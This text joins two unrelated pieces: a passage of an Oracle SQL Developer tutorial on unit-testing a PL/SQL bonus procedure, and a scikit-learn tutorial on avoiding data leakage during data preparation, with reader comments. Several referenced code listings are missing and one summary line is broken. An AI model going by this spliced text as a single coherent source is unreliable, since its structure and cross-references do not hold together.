To run the unit test, use the Unit Test navigator. If this navigator is not visible on the left side, click View, then Unit Test. In the Unit Test navigator, expand the Tests node and click the AWARD_BONUS test. A pane for the AWARD_BONUS test is displayed, with Details and Results tabs. On the Details tab, near the top-right corner, select the database connection for the schema that you used to create the AWARD_BONUS procedure. Do not change any other values. (However, if you later want to run the unit test with different specifications or data values, you can click the Edit (pencil) icon in the Code Editor toolbar at the top of the pane.) Click the Run Test (green arrowhead) icon in the Code Editor toolbar (or press F9). At this point, focus is shifted to the Results tab, where you can soon see that the AWARD_BONUS test ran successfully.
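If you want to see the procedure's arithmetic for yourself outside the unit testing framework, a quick manual check like the following can be run in a SQL Worksheet. This is a sketch that is not part of the tutorial; it assumes you have not committed other changes in the session, so that ROLLBACK restores the original salary of 8400:

```sql
-- Call AWARD_BONUS directly and confirm the expected result:
-- 8400 (base salary) + 5000 * 0.2 (bonus) = 9400.
BEGIN
  award_bonus(1001, 5000);
END;
/
SELECT salary FROM employees WHERE employee_id = 1001;  -- expect 9400
ROLLBACK;  -- undo the update so the table data matches the tutorial again
```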
If you want to check the EMPLOYEES table data, you will see that the salary for employee 1001 is the same as it was before (8400), because the startup action for the unit test copied the original data to the temporary table and the teardown action restored the original data to the EMPLOYEES table.

4.13.6 Create and Run an Exception Unit Test

Create another unit test for the exception condition where the COMMISSION_PCT value is null for the employee, and therefore no commission or bonus can be calculated. For this tutorial, the test data includes employee 1004 with a null commission percentage. (This condition could result from several possible scenarios, the most likely being an attempt to run the procedure on a salaried employee who is not eligible for commissions.)

The steps for creating this exception unit test are similar to those in Create a Unit Test, except there are no startup or teardown steps because this test should not modify any table data, and there is no need for any validation action. For the test name, specify AWARD_BONUS_NO_COMM_EXC, and select Create with single dummy representation. In Specify Startup, click Next to go to the next page. In Specify Parameters, change the values in the Input column to the following:

EMP_ID: 1004
SALES_AMT: 5000

For Expected Result, change the value to Exception and leave the expected error number as ANY. In Specify Validations, click Next to go to the next page. In Specify Teardown, click Next to go to the next page. In Summary, review the information. If you need to change anything, click Back as needed and make the changes, then proceed to this Summary page. When you are ready to complete the unit test definition, click Finish.

To run this unit test, follow the steps in Run the Unit Test, except specify AWARD_BONUS_NO_COMM_EXC instead of AWARD_BONUS.
On the Results tab, you will see that the AWARD_BONUS_NO_COMM_EXC test ran successfully; and if you check the EMPLOYEES table data, you will see that the information for employee 1004 (and all the other employees) was not changed.

Note: As an alternative to creating a separate unit test for the exception condition, you could add it as an implementation to the AWARD_BONUS test (right-click AWARD_BONUS and select Add Implementation). Thus, the AWARD_BONUS unit test would have two implementations: the "Default" implementation using employee 1001, and the AWARD_BONUS_NO_COMM_EXC implementation using employee 1004. The approach in this tutorial enables you to create a simple unit test suite using the two unit tests. However, in more realistic unit testing scenarios, it is probably better to use a unit test for each procedure, add implementations for each test case for a procedure, and group multiple unit tests (for individual procedures) into one or more test suites.

4.13.7 Create a Unit Test Suite

Create a unit test suite that groups together the two unit tests of the AWARD_BONUS procedure. If the Unit Test navigator is not visible on the left side, click View, then Unit Test. In the Unit Test navigator, right-click the Suites node and select Add Suite. In the Unit Testing: Add Test Suite dialog box, specify AWARD_BONUS_SUITE as the suite name. In the Unit Test navigator, under Suites, click the AWARD_BONUS_SUITE node. A pane for the AWARD_BONUS_SUITE test suite is displayed. Do not specify a Startup Process or Teardown Process, because neither is needed for this test suite.

Click the Add (+) icon to add the first test to the suite. In the Unit Testing: Add Tests or Suites to a Suite dialog box, click (select) AWARD_BONUS, check (select) Run Test Startups and Run Test Teardowns so that the startup and teardown actions for that unit test will be run, and click OK. Click the Add (+) icon to add the next test to the suite.
In the Unit Testing: Add Tests or Suites to a Suite dialog box, click (select) AWARD_BONUS_NO_COMM_EXC, and click OK. (The Run Test Startups and Run Test Teardowns options are irrelevant here because the AWARD_BONUS_NO_COMM_EXC test does not perform any startup and teardown actions.) Click the Commit Changes icon in the Code Editor toolbar at the top of the pane (or press F11).

4.13.8 Run the Unit Test Suite

To run the unit test suite, use the Unit Test navigator. If you are in the editing pane for the AWARD_BONUS_SUITE test suite, run the suite by clicking the Run Suite (green arrowhead) icon in the Code Editor toolbar. Otherwise, perform the following steps: In the Unit Test navigator, expand the Suites node and click the AWARD_BONUS_SUITE test suite. A pane for the AWARD_BONUS_SUITE test suite is displayed, with Details and Results tabs. On the Details tab, near the top-right corner, select the database connection for the schema that you used to create the AWARD_BONUS procedure. Do not change any other values. (However, if you later want to run the unit test suite with different specifications, you can click the Edit (pencil) icon in the Code Editor toolbar at the top of the pane.) Click the Run Suite (green arrowhead) icon in the Code Editor toolbar (or press F9). After the suite is run, focus is shifted to the Results tab, where you can soon see that the AWARD_BONUS_SUITE test suite ran successfully.
https://docs.oracle.com/en/database/oracle/sql-developer/18.3/rptug/sql-developer-unit-testing.html
Last Updated on August 17, 2020

Data preparation is the process of transforming raw data into a form that is appropriate for modeling. A naive approach to preparing data applies the transform on the entire dataset before evaluating the performance of the model. This results in a problem referred to as data leakage, where knowledge of the hold-out test set leaks into the dataset used to train the model. This can result in an incorrect estimate of model performance when making predictions on new data. A careful application of data preparation techniques is required in order to avoid data leakage, and this varies depending on the model evaluation scheme used, such as train-test splits or k-fold cross-validation.

In this tutorial, you will discover how to avoid data leakage during data preparation when evaluating machine learning models. After completing this tutorial, you will know:

- How the naive application of data preparation to the entire dataset results in data leakage.
- How to correctly apply data preparation when using train and test sets.
- How to correctly apply data preparation when using k-fold cross-validation.

Kick-start your project with my new book Data Preparation for Machine Learning, including step-by-step tutorials and the Python source code files for all examples.

Let's get started.

Tutorial Overview

This tutorial is divided into three parts; they are:

- Problem With Naive Data Preparation
- Data Preparation With Train and Test Sets
  - Train-Test Evaluation With Naive Data Preparation
  - Train-Test Evaluation With Correct Data Preparation
- Data Preparation With k-fold Cross-Validation
  - Cross-Validation Evaluation With Naive Data Preparation
  - Cross-Validation Evaluation With Correct Data Preparation

Problem With Naive Data Preparation

The manner in which data preparation techniques are applied to data matters. A common approach is to first apply one or more transforms to the entire dataset. Then the dataset is split into train and test sets or k-fold cross-validation is used to fit and evaluate a machine learning model.

1. Prepare Dataset
2. Split Data
3. Evaluate Models

Although this is a common approach, it is dangerously incorrect in most cases.
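To make the naive ordering concrete, here is a minimal pure-Python sketch of it. The five data values and the use of min-max scaling are assumptions chosen purely for illustration, not from any real dataset:

```python
# Naive (leaky) ordering: the whole dataset is scaled BEFORE splitting,
# so the scaling parameters are computed using rows that later become test data.
data = [1.0, 2.0, 3.0, 4.0, 100.0]  # the last value will end up in the test set

# 1. Prepare dataset: min-max scale using the minimum/maximum of ALL rows
lo, hi = min(data), max(data)
scaled = [(x - lo) / (hi - lo) for x in data]

# 2. Split data (after the transform -- this is the mistake)
train, test = scaled[:4], scaled[4:]

# The training rows were scaled with the test row's value (100.0) as the maximum,
# so knowledge of the hold-out data has leaked into the training set.
print(train)
```

Note how the training values are squashed toward zero: their scale is dictated by an extreme value that the model should never have seen.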
The problem with applying data preparation techniques before splitting data for model evaluation is that it can lead to data leakage and, in turn, will likely result in an incorrect estimate of a model’s performance on the problem.

Data leakage refers to a problem where information about the holdout dataset, such as a test or validation dataset, is made available to the model in the training dataset. This leakage is often small and subtle but can have a marked effect on performance.

… leakage means that information is revealed to the model that gives it an unrealistic advantage to make better predictions. This could happen when test data is leaked into the training set, or when data from the future is leaked to the past. Any time that a model is given information that it shouldn’t have access to when it is making predictions in real time in production, there is leakage.

— Page 93, Feature Engineering for Machine Learning, 2018.

We get data leakage by applying data preparation techniques to the entire dataset. This is not a direct type of data leakage, where we would train the model on the test dataset. Instead, it is an indirect type of data leakage, where some knowledge about the test dataset, captured in summary statistics, is available to the model during training. This can make it a harder type of data leakage to spot, especially for beginners.

One other aspect of resampling is related to the concept of information leakage which is where the test set data are used (directly or indirectly) during the training process. This can lead to overly optimistic results that do not replicate on future data points and can occur in subtle ways.

— Page 55, Feature Engineering and Selection, 2019.

For example, consider the case where we want to normalize the data, that is, scale input variables to the range 0-1.
When we normalize the input variables, this requires that we first calculate the minimum and maximum values for each variable before using these values to scale the variables. The dataset is then split into train and test datasets, but the examples in the training dataset know something about the data in the test dataset; they have been scaled by the global minimum and maximum values, so they know more about the global distribution of the variable than they should.

We get the same type of leakage with almost all data preparation techniques; for example, standardization estimates the mean and standard deviation values from the domain in order to scale the variables; even models that impute missing values using a model or summary statistics will draw on the full dataset to fill in values in the training dataset.

The solution is straightforward. Data preparation must be fit on the training dataset only. That is, any coefficients or models prepared for the data preparation process must only use rows of data in the training dataset. Once fit, the data preparation algorithms or models can then be applied to the training dataset, and to the test dataset.

- 1. Split Data.
- 2. Fit Data Preparation on Training Dataset.
- 3. Apply Data Preparation to Train and Test Datasets.
- 4. Evaluate Models.

More generally, the entire modeling pipeline must be prepared only on the training dataset to avoid data leakage. This might include data transforms, but also other techniques such as feature selection, dimensionality reduction, feature engineering and more. This means so-called “model evaluation” should really be called “modeling pipeline evaluation”.

In order for any resampling scheme to produce performance estimates that generalize to new data, it must contain all of the steps in the modeling process that could significantly affect the model’s effectiveness.

— Pages 54-55, Feature Engineering and Selection, 2019.
Now that we are familiar with how to apply data preparation to avoid data leakage, let’s look at some worked examples.

Want to Get Started With Data Preparation?

Take my free 7-day email crash course now (with sample code). Click to sign-up and also get a free PDF Ebook version of the course.

Download Your FREE Mini-Course

Data Preparation With Train and Test Sets

In this section, we will evaluate a logistic regression model using train and test sets on a synthetic binary classification dataset where the input variables have been normalized.

First, let’s define our synthetic dataset. We will use the make_classification() function to create the dataset with 1,000 rows of data and 20 numerical input features. The example below creates the dataset and summarizes the shape of the input and output variable arrays.

Running the example creates the dataset and confirms that the input part of the dataset has 1,000 rows and 20 columns for the 20 input variables and that the output variable has 1,000 examples to match the 1,000 rows of input data, one value per row.

Next, we can evaluate our model on the scaled dataset, starting with the naive or incorrect approach.

Train-Test Evaluation With Naive Data Preparation

The naive approach involves first applying the data preparation method, then splitting the data before finally evaluating the model.

We can normalize the input variables using the MinMaxScaler class, which is first defined with the default configuration scaling the data to the range 0-1, then the fit_transform() function is called to fit the transform on the dataset and apply it to the dataset in a single step. The result is a normalized version of the input variables, where each column in the array is separately normalized (e.g. has its own minimum and maximum calculated).

Next, we can split our dataset into train and test sets using the train_test_split() function. We will use 67 percent for the training set and 33 percent for the test set.
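The original code listing is not shown in this extract; a minimal sketch consistent with the description might look like the following (dataset parameters such as n_informative, n_redundant and the random_state values are illustrative assumptions, not the post's exact settings):

```python
# Naive (incorrect) ordering: scale the whole dataset first, then split.
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler

# Synthetic binary classification dataset: 1,000 rows, 20 input features.
X, y = make_classification(n_samples=1000, n_features=20, n_informative=15,
                           n_redundant=5, random_state=7)
print(X.shape, y.shape)  # (1000, 20) (1000,)

# Fit the scaler on ALL rows -- this is the source of the leakage.
scaler = MinMaxScaler()
X_scaled = scaler.fit_transform(X)

# Only now split into train (67 percent) and test (33 percent) sets.
X_train, X_test, y_train, y_test = train_test_split(
    X_scaled, y, test_size=0.33, random_state=7)
```

Note that the test rows have already influenced the per-column minimum and maximum used to scale the training rows.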
We can then define our logistic regression algorithm via the LogisticRegression class, with default configuration, and fit it on the training dataset.

The fit model can then make a prediction for the input data for the test set, and we can compare the predictions to the expected values and calculate a classification accuracy score.

Tying this together, the complete example is listed below.

Running the example normalizes the data, splits the data into train and test sets, then fits and evaluates the model. In this case, the model achieved an estimated accuracy of about 84.848 percent.

Given we know that there was data leakage, we know that this estimate of model accuracy is wrong.

Next, let’s explore how we might correctly prepare the data to avoid data leakage.

Train-Test Evaluation With Correct Data Preparation

The correct approach to performing data preparation with a train-test split evaluation is to fit the data preparation on the training set, then apply the transform to the train and test sets.

This requires that we first split the data into train and test sets.

We can then define the MinMaxScaler and call the fit() function on the training set, then apply the transform() function on the train and test sets to create a normalized version of each dataset. This avoids data leakage as the calculation of the minimum and maximum value for each input variable is calculated using only the training dataset (X_train) instead of the entire dataset (X).

The model can then be evaluated as before.

Tying this together, the complete example is listed below.

Running the example splits the data into train and test sets, normalizes the data correctly, then fits and evaluates the model. In this case, the model achieved an estimated accuracy of about 85.455 percent, which is more accurate than the estimate with data leakage in the previous section that achieved an accuracy of 84.848 percent.

We expect data leakage to result in an incorrect estimate of model performance. We would expect this to be an optimistic estimate with data leakage, e.g. better performance, although in this case, we can see that data leakage resulted in slightly worse performance.
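The correct train-test listing described above might be sketched as follows (again, the exact dataset parameters and random seeds are assumptions; your accuracy will differ slightly from the figures quoted in the text):

```python
# Correct ordering: split first, fit data preparation on the training set only.
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler

X, y = make_classification(n_samples=1000, n_features=20, n_informative=15,
                           n_redundant=5, random_state=7)

# 1. Split the data.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.33, random_state=1)

# 2. Fit the transform on the training set only.
scaler = MinMaxScaler()
scaler.fit(X_train)

# 3. Apply the transform to both train and test sets.
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)

# 4. Fit and evaluate the model.
model = LogisticRegression()
model.fit(X_train, y_train)
yhat = model.predict(X_test)
acc = accuracy_score(y_test, yhat)
print('Accuracy: %.3f' % (acc * 100))
```

The test set no longer contributes to the per-column minimum and maximum, so scaled test values can fall slightly outside the range 0-1; that is expected.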
This might be because of the difficulty of the prediction task.

Data Preparation With k-fold Cross-Validation

In this section, we will evaluate a logistic regression model using k-fold cross-validation on a synthetic binary classification dataset where the input variables have been normalized.

You may recall that k-fold cross-validation involves splitting a dataset into k non-overlapping groups of rows. The model is then trained on all but one group to form a training dataset and then evaluated on the held-out fold. This process is repeated so that each fold is given a chance to be used as the holdout test set. Finally, the average performance across all evaluations is reported.

The k-fold cross-validation procedure generally gives a more reliable estimate of model performance than a train-test split, although it is more computationally expensive given the repeated fitting and evaluation of models.

Let’s first look at naive data preparation with k-fold cross-validation.

Cross-Validation Evaluation With Naive Data Preparation

Naive data preparation with cross-validation involves applying the data transforms first, then using the cross-validation procedure.

We will use the synthetic dataset prepared in the previous section and normalize the data directly.

The k-fold cross-validation procedure must first be defined. We will use repeated stratified 10-fold cross-validation, which is a best practice for classification. Repeated means that the whole cross-validation procedure is repeated multiple times, three in this case. Stratified means that each group of rows will have the same relative composition of examples from each class as the whole dataset. We will use k=10 or 10-fold cross-validation.
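The fold-by-fold mechanics recalled above can be written out by hand, which may help make the procedure concrete; this is a sketch only (the listings in this tutorial let cross_val_score handle the looping, and the seeds here are illustrative):

```python
# Hand-rolled k-fold cross-validation: train on all but one fold,
# evaluate on the held-out fold, then average the k scores.
from numpy import mean
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import StratifiedKFold

X, y = make_classification(n_samples=1000, n_features=20, random_state=7)

cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=1)
scores = []
for train_ix, test_ix in cv.split(X, y):
    # Fit a fresh model on the k-1 training folds.
    model = LogisticRegression(max_iter=1000).fit(X[train_ix], y[train_ix])
    # Score it on the single held-out fold.
    scores.append(model.score(X[test_ix], y[test_ix]))
print('Mean accuracy over %d folds: %.3f' % (len(scores), mean(scores) * 100))
```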
This can be achieved using the RepeatedStratifiedKFold class, which can be configured for three repeats and 10 folds, and then using the cross_val_score() function to perform the procedure, passing in the defined model, cross-validation object, and metric to calculate, in this case, accuracy. We can then report the average accuracy across all of the repeats and folds.

Tying this all together, the complete example of evaluating a model with cross-validation using data preparation with data leakage is listed below.

Running the example normalizes the data first, then evaluates the model using repeated stratified cross-validation.

Note: Your results may vary given the stochastic nature of the algorithm or evaluation procedure, or differences in numerical precision. Consider running the example a few times and compare the average outcome.

In this case, we can see that the model achieved an estimated accuracy of about 85.300 percent, which we know is incorrect given the data leakage allowed via the data preparation procedure.

Next, let’s look at how we can evaluate the model with cross-validation and avoid data leakage.

Cross-Validation Evaluation With Correct Data Preparation

Data preparation without data leakage when using cross-validation is slightly more challenging.

It requires that the data preparation method is prepared on the training set and applied to the train and test sets within the cross-validation procedure, e.g. the groups of folds of rows. We can achieve this by defining a modeling pipeline that defines a sequence of data preparation steps to perform, ending in the model to fit and evaluate.

To provide a solid methodology, we should constrain ourselves to developing the list of preprocessing techniques, estimate them only in the presence of the training data points, and then apply the techniques to future data (including the test set).

— Page 55, Feature Engineering and Selection, 2019.
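The two cross-validation listings discussed in this section and the next are not shown in this extract; a combined sketch, with assumed dataset parameters and seeds, might look like this:

```python
# Naive vs correct cross-validation. The naive version scales the whole
# dataset before CV; the correct version wraps the scaler and model in a
# Pipeline, so the scaler is re-fit on the training folds of every split.
from numpy import mean, std
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import RepeatedStratifiedKFold, cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler

X, y = make_classification(n_samples=1000, n_features=20, n_informative=15,
                           n_redundant=5, random_state=7)
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)

# Naive: leakage, because per-column min/max are computed over all rows.
X_leaky = MinMaxScaler().fit_transform(X)
naive_scores = cross_val_score(LogisticRegression(), X_leaky, y,
                               scoring='accuracy', cv=cv)

# Correct: each step is a (name, object) tuple; the model must come last.
pipeline = Pipeline(steps=[('scaler', MinMaxScaler()),
                           ('model', LogisticRegression())])
correct_scores = cross_val_score(pipeline, X, y, scoring='accuracy', cv=cv)

print('Naive:   %.3f (%.3f)' % (mean(naive_scores) * 100, std(naive_scores) * 100))
print('Correct: %.3f (%.3f)' % (mean(correct_scores) * 100, std(correct_scores) * 100))
```

With 3 repeats of 10 folds, each call evaluates 30 models and returns 30 scores.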
The evaluation procedure changes from simply and incorrectly evaluating just the model to correctly evaluating the entire pipeline of data preparation and model together as a single atomic unit.

This can be achieved using the Pipeline class. This class takes a list of steps that define the pipeline. Each step in the list is a tuple with two elements. The first element is the name of the step (a string) and the second is the configured object of the step, such as a transform or a model. The model is only supported as the final step, although we can have as many transforms as we like in the sequence.

We can then pass the configured object to the cross_val_score() function for evaluation.

Tying this together, the complete example of correctly performing data preparation without data leakage when using cross-validation is listed below.

Running the example normalizes the data correctly within the cross-validation folds of the evaluation procedure to avoid data leakage.

Note: Your results may vary given the stochastic nature of the algorithm or evaluation procedure, or differences in numerical precision. Consider running the example a few times and compare the average outcome.

In this case, we can see that the model has an estimated accuracy of about 85.433 percent, compared to the approach with data leakage that achieved an accuracy of about 85.300 percent.

As with the train-test example in the previous section, removing data leakage has resulted in a slight improvement in performance when our intuition might suggest a drop, given that data leakage often results in an optimistic estimate of model performance.

Nevertheless, the examples clearly demonstrate that data leakage does impact the estimate of model performance and how to correct data leakage by correctly performing data preparation after the data is split.

Further Reading

This section provides more resources on the topic if you are looking to go deeper.
Tutorials

- How to Prepare Data For Machine Learning
- Applied Machine Learning Process
- Data Leakage in Machine Learning

Books

- Feature Engineering and Selection: A Practical Approach for Predictive Models, 2019.
- Applied Predictive Modeling, 2013.
- Data Mining: Practical Machine Learning Tools and Techniques, 2016.
- Feature Engineering for Machine Learning, 2018.

APIs

- sklearn.datasets.make_classification API.
- sklearn.preprocessing.MinMaxScaler API.
- sklearn.model_selection.train_test_split API.
- sklearn.linear_model.LogisticRegression API.
- sklearn.model_selection.RepeatedStratifiedKFold API.
- sklearn.model_selection.cross_val_score API.

Articles

Summary

In this tutorial, you discovered how to avoid data leakage during data preparation when evaluating machine learning models.

Specifically, you learned: -.

Do you have any questions? Ask your questions in the comments below and I will do my best to answer.

Hello Jason and thanks for this article. I’m wondering, what if we separate the training and test sets first, then apply a simple min-max or z-score normalizer to each differently, will that help with data leakage? I’m assuming a situation where we don’t use the MinMaxScaler or any other in-built scaler from any library at all, but just a simple function we can apply to the features of both the training and testing sets separately, for example a simple min-max method like:

def min_max(x_train): return (x_train - min(x_train)) / (max(x_train) - min(x_train))

Will separating the data sets before applying this function to each help to reduce or prevent data leakage? If that won’t work, how can we avoid data leakage without using the MinMaxScaler() or StandardScaler() classes?

As long as any coefficients you calculate are prepared on the training set only, or use domain knowledge that is broader than both datasets. The above examples show exactly how to avoid data leakage with a train/test split.
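Following Jason's answer, a hand-rolled version without sklearn is fine as long as the min and max are learned from the training set and reused for the test set; a sketch (function and variable names here are illustrative, extending the commenter's min_max idea to per-column arrays):

```python
# Hand-rolled min-max scaling: coefficients come from the training data only.
import numpy as np

def fit_min_max(X_train):
    # Learn the per-column min and max from the training rows only.
    return X_train.min(axis=0), X_train.max(axis=0)

def apply_min_max(X, col_min, col_max):
    # Reuse the training-set coefficients on any dataset.
    return (X - col_min) / (col_max - col_min)

rng = np.random.default_rng(1)
X_train = rng.normal(size=(100, 3))
X_test = rng.normal(size=(50, 3))

col_min, col_max = fit_min_max(X_train)
X_train_s = apply_min_max(X_train, col_min, col_max)
# Test values may fall slightly outside [0, 1]; that is expected and leak-free.
X_test_s = apply_min_max(X_test, col_min, col_max)
```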
Jason, thank you for this incredible material. I’m a huge fan of your work, which contributes a great deal to my education and knowledge of the field. Thank you, and God bless. Priscila

You’re very welcome Priscila!

Thanks for the article. I have two questions: When people report an accuracy that has been done “properly”, is there any particular terminology they would use to signify this? When I drop incomplete data rows, should I adjust the accuracy I quote to account for that? (Obviously, a model that doesn’t deal with incomplete data will not make good predictions on any new incomplete data.) Alternatively, is it reasonable to quote the accuracy I expect the model to achieve on complete data?

Hmmm. Great question! We should try to be as complete as possible when describing how data has been prepared and how a model has been evaluated. Ideally, we would provide code to accompany a paper or report that produces the output described in the report so anyone can reproduce the result and extend it.

Hi Jason, Awesome tutorial like always. What if we want to make a prediction on a single row? How would we scale it then? We cannot apply a standard or min-max scaler on a single row. Thanks.

You can: make it a matrix and transform it.

Jason, Thanks for a clear presentation that illustrates the principles! I agree with you that the exact estimate of the model’s performance is best done in this manner, given a split between training and validation sets. However, I think it is also valuable to split into training, validation and test, in which you hold the test data out of the model until it is optimised. Thereby, the validation data can be used when optimising meta parameters for the model, and in my opinion also be used for fitting scalers. My argument for this is that in a real-life problem, you don’t just want to know the performance of the model, you also want it to be as robust as possible. Let us say that you split your data into three, for training, validation and test.
I would use both the training and validation for fitting the scaler, and I use the test data to see if I get any surprises with data that fit the model poorly. Evaluation of which variables to include should also be seen in this light. Let’s say that you have elevation of measurements as an input, and this is scaled according to the range of your training data. In that case, there is no guarantee that new data points are within this range, which can strongly affect non-linear classification or regression methods.

You’re very welcome! Yes, you can split the validation from the training set. More here:

Dear Dr Jason, In the above code for correct handling of the cross validation data, particularly the line: If we were to take the naive method, then the std dev of the whole of X is the cause of the leakage. In contrast, applying the pipeline means that the std deviation of each subsample is taken into account? Thank you, Anthony of Sydney

The pipeline fits the transform (whole pipeline) on the training part of each CV-split only.

Thank you again in advance. One more question about “…on the training part of each CV-split only”. That is, each CV-split has its own std deviation. In contrast, the ‘naive’ method does the whole dataset and does not take into account the individual std deviation of a particular split. Hence the Pipeline ensured that the global std dev of the features X did not leak into each CV-split? Thank you, Anthony of Sydney

When using a pipeline, the transform is not applied to the entire dataset; it is applied as needed to training data only for each repetition of the model evaluation procedure.

Thank you, Anthony of Sydney

You’re welcome.

Dear Dr Jason, I wish to compare the model performance that is naive and pipelined. From your book, listing 4.7 page 29, (46 of 398), I have successfully implemented. I will present the successful implementation of the naive code then my attempt to make a pipelined model.
Successful naive model on your code in listing 4.7, page 29 of your book. Skip this to see my attempt at pipelining. My aim is to construct a pipeline and compare the accuracy score and the cross validation scores of the model that has been pipelined. What must I put in the pipeline? This is what I would like to do. FOR THE CRUX OF THE MATTER SKIP THIS CODE, THIS IS THE QUESTION: The question is what further steps must I add to get a pipelined model of listing 4.7 of your book, with the aim to get: Please point me in the direction, I will work it out eventually. Thank you for your time and your ebook. Anthony of Sydney

The problem is not obvious to me, sorry; what is the nature of the error you’re getting?

Dear Dr Jason, Thank you for your reply. These are the functions I wish to invoke within a Pipeline. Here are the errors when I invoke the abovementioned functions within a Pipeline: Is there something that I am omitting or should do, please? Thank you, Anthony of Sydney

Sorry, it is not clear to me what the cause is; you will have to debug the error.

Dear Dr Jason, Here is further information on setting up the Pipeline. Should I have added more steps in the pipeline? This is to avoid the errors described above when invoking. Thank you, Anthony of Sydney

The pipeline looks good to me. Perhaps confirm your data was loaded correctly. Perhaps try a different dataset and see if it still causes errors. Perhaps try different models and see if it still causes errors.

Dear Dr Jason, Thank you, your advice to change the dataset worked! I used the pima-indians-diabetes.csv file, WHICH WORKED, compared to the synthetic make_classification data that presented the problem. I present the programs, and the conclusions at the end.
Programs: I present the code for the pipelined and naive models.

For the pipelined model:
accuracy 0.7755905511811023 # from the accuracy score
mean(scores), std(scores) (0.7704032809295966, 0.04222493685923635) # from the cross validation scores

For the naive model:
accuracy 0.7755905511811023 # from the accuracy score
mean(scores), std(scores) (0.7717076782866258, 0.04318082938105522) # from the cross validation scores

Summary and conclusions:
* accuracy: there appears to be no difference between the pipelined and naive models, being 0.775591.
* mean and stddev of the cross_validation scores: the pipelined method produced a slightly lower mean and std dev of scores at 0.770 and 0.042 respectively, compared to the naive model’s mean and std dev of scores at 0.772 and 0.043.
* Why my model worked with the pima-indians data but not the synthetic make_classification data: generally it works, and there is no change in accuracy between the pipelined and naive models. There are slightly lower cross_validation mean and stddev scores for the pipelined model compared to the naive model. However, I don’t know why the synthetically generated make_classification values caused a problem.

Thank you, Anthony from Sydney

Well done!

Dear Dr Jason, One further remark and one question:
* Given that the accuracy for the naive and pipelined model is the same, we can conclude that there may well be very little leakage in the naive model.
* Question please: why did using the synthetic dataset make_classification (from sklearn.datasets import make_classification) produce errors, whereas the pima-indians-diabetes dataset worked?
Thank you, Anthony of Sydney

Yes, that may be the case. I don’t know off hand; perhaps check for bugs in your implementation or copy-paste.

Dear Dr Jason, Thank you. For the second line, I reran the synthetic dataset from make_classification using the models that worked for the pima-indians-diabetes.
The results for the pipelined and naive models using the synthetic make_classification data are:

Pipeline method, using the synthetic make_classification data:
accuracy 0.8424242424242424
mean(scores), std(scores) (0.8153333333333334, 0.04341530708043982)

Naive method, using the synthetic make_classification data:
accuracy 0.8393939393939394
mean(scores), std(scores) (0.8153333333333334, 0.04341530708043982)

Summary: Using the make_classification synthetic data, the pipelined method gives a greater accuracy score than the naive method, while the mean and stddev of the scores are the same in both the pipelined and naive models.

Thank you for your advice, Anthony of Sydney

Well done.

Hi Jason, Thank you for this detailed post! I seem to be lost a little bit here and may need more clarification. Under the section “Cross-Validation Evaluation With Correct Data Preparation” and in the last code box, line 20, here is how I interpret that:
- We have fed the “entire” dataset into the cross_val_score function. Therefore, the cv function splits the “entire” data into training and test sets for pre-processing and modeling.
- Then the pipeline is applied to both training and test sets “separately”, develops a logistic regression on the training set, and evaluates it on the test set.
Now my question is, where is the cross-validation set? Given that we have fed the “entire” dataset into the cross_val_score function and the cv function splits the data into two sets, train and test, I can’t imagine how the cross-validation set is created internally and used in the process. Am I missing something here? Thank you, Mahdi

Thanks. The cross_val_score function does not split into train and test sets; it performs the cross-validation process. You can learn more here:

Thank you, Jason, for your prompt reply. So, in the cross_val_score in your example, we are feeding the entire dataset, X & y, to the model as well as a cv function.
My understanding from this combination is that the cv splits the data iteratively and then in each iteration the pipeline is applied. This means two sub-datasets are created in each iteration. What are these two sub-sets? Test, train, or cross-validation? Thanks again! Mahdi

The dataset is split into k non-overlapping folds; one fold is held back to evaluate the model (test) and the rest are used to train the model, and a score is recorded. This is then repeated so that each fold gets a chance to be used as the hold-out set, meaning we evaluate k models and get k scores. This is the k-fold cross-validation process, not a train-test process, which is something different. Learn more about how k-fold cross-validation works here:

Thanks, Jason! I have seen that in some instances a test set is held out (using train_test_split) and the train set is then fed into the pipeline and cross_val_score. How different is that from what you did (as you used the whole dataset in cross_val_score)? When do we use your approach and when the other one? Thank you again for your responses! Mahdi

Perhaps the hold-out set is used as a final validation of the selected model. A good approach if you can spare the data.

In that case, how do we avoid data leakage in the CV, since we do:
1. split train/test
2. fit_transform on train + transform on test
3. use the already transformed train set to feed the CV => data leakage

If you do that, then yes, there would be leakage. You would use a pipeline within the CV that will correctly fit/apply transforms.

Hello Jason, I agree that some preprocessing methods may lead to data leakage. But I do not get why the normalization step could cause such a problem. If you want to avoid covariate shift, the train set and test set should have similar distributions. If so, statistical properties like min, max or std should be similar for both sets, and normalization on the training set or the full dataset should not be so significant. Could you please explain what I am missing?
Thank you very much! Melec

If any data prep coefficients (e.g. min/max/mean/stdev/…) use out-of-sample data (e.g. the test set), that is data leakage.

Thank you for sharing a great article! In case we have multiple rows for some subjects (e.g., more than one example for some subjects), do you have any recommendation in your book for prevention of data leakage? Would be great to see an example of how to split data 1) while keeping the prevalence in train and test sets, and 2) preventing the same subject from being in both the training and test sets.

Wonderful point! Yes, data for the same subject probably should (must!?) be kept together in the same dataset to avoid data leakage.

How can I implement several pre-processing steps using a pipeline after performing train_test_split, similar to the approach you showed for CV?

You can use a pipeline.

I define a pipeline which has imputer, stdscaler etc. as follows: pl=Pipeline(….) Then fit it: pl.fit(X_train,y_train). As I’ve performed train_test_split before any pre-processing, my X_test contains missing values. Using pl.score(X_test,y_test) does not apply the pipeline pre-processing to the X_test dataset, as it shows an error for NaN. What can I use to apply the same pre-processing to X_test? Even pl.predict gives an error. This is the pipeline: dt=DecisionTreeClassifier() pl=Pipeline(steps=[(‘transform’,col_transform),(‘dt’,dt)])

If the pipeline has an imputer, and the test set is just like the train set, then the pipeline will handle the missing values. Perhaps use fit() then predict() and evaluate the results manually.

Thanks a lot Jason. Tc

You’re welcome.

Hi, I am currently working through this problem, and I have a conceptual question about leakage and the scaling operation.
1. Split the data.
2. Fit the scaler to the training data (but not the test data).
